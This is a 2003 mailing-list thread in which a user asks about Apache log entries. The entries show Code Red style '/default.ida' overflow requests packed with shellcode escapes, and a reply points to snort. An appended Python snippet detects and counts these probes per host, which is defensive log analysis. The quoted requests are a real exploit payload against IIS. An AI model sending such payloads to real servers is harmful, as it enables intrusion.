Hi Konstantin. I do also find a lot of these messages day by day... Since I installed >snort< I know that most of these attacks try to exploit IIS servers and so are not too important to me. Anyway: since snort "knows" quite a lot of these attacks, it will probably help you!
Sven

Konstantin Filtschew wrote:
Hi, found this in my /var/log/apache/access.log, what does that mean:

217.37.212.241 - - [04/May/2003:15:17:22 +0200] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u 9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"

217.128.213.22 - - [04/May/2003:14:50:16 +0200] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u 9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"

217.218.66.141 - - [04/May/2003:13:39:56 +0200] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u 9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"

212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET /.hash=680d6f5c4d584f6b5d941a f136938db3751a840b HTTP/1.1" 404 324 "-" "-"

212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET /.hash=e175a0da67b1fefbb5acd8 cdc7ccc516ede015d1 HTTP/1.1" 404 324 "-" "-"

212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET /.hash=8c10ba0aae81edb7ae51eb 156b2fcb770b66864a HTTP/1.1" 404 324 "-" "-"

Thx for help

Konstantin Filtschew
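Added example, not part of the original thread: a small Python filter for an Apache access log that counts `.ida` requests of the shape quoted above per source host and lists any that were not answered with a 4xx status, which is the case worth a closer look. The function names, the regex heuristic and the sample lines (documentation addresses, shortened filler) are assumptions constructed for this illustration.

```python
import re
from collections import Counter

# Apache log line: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# Heuristic derived from the quoted entries (an assumption, not a snort rule):
# a .ida request whose query starts with a long run of one filler character
# and later contains %uXXXX escapes.
IDA_RE = re.compile(r'^GET /[^?\s]*\.ida\?(.)\1{20,}.*%u[0-9a-fA-F]{4}', re.I)


def classify(line):
    """Return (host, status, label) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    label = "ida-overflow-probe" if IDA_RE.match(m.group("request")) else "other"
    return m.group("host"), int(m.group("status")), label


def summarize(lines):
    """Count probes per host; collect probes that did not receive a 4xx."""
    probes, answered = Counter(), []
    for line in lines:
        hit = classify(line)
        if hit and hit[2] == "ida-overflow-probe":
            host, status, _ = hit
            probes[host] += 1
            if not 400 <= status < 500:
                answered.append((host, status))
    return probes, answered


# Constructed sample input, not taken from the log in the thread.
FILL = "X" * 40
SAMPLE = [
    f'192.0.2.10 - - [04/May/2003:15:17:22 +0200] "GET /default.ida?{FILL}%u9090%u6858=a HTTP/1.0" 404 277 "-" "-"',
    f'192.0.2.10 - - [04/May/2003:15:17:25 +0200] "GET /default.ida?{FILL}%u9090%u6858=a HTTP/1.0" 404 277 "-" "-"',
    '198.51.100.7 - - [04/May/2003:15:18:01 +0200] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
    f'203.0.113.5 - - [04/May/2003:15:19:40 +0200] "GET /default.ida?{FILL}%u9090=a HTTP/1.0" 200 512 "-" "-"',
]

if __name__ == "__main__":
    probes, answered = summarize(SAMPLE)
    print("probes per host:", dict(probes))
    print("probes not answered with 4xx:", answered)
```

On an Apache host the probes normally show up with status 404, as in the log above; an entry in the second list means something on the server actually answered the request.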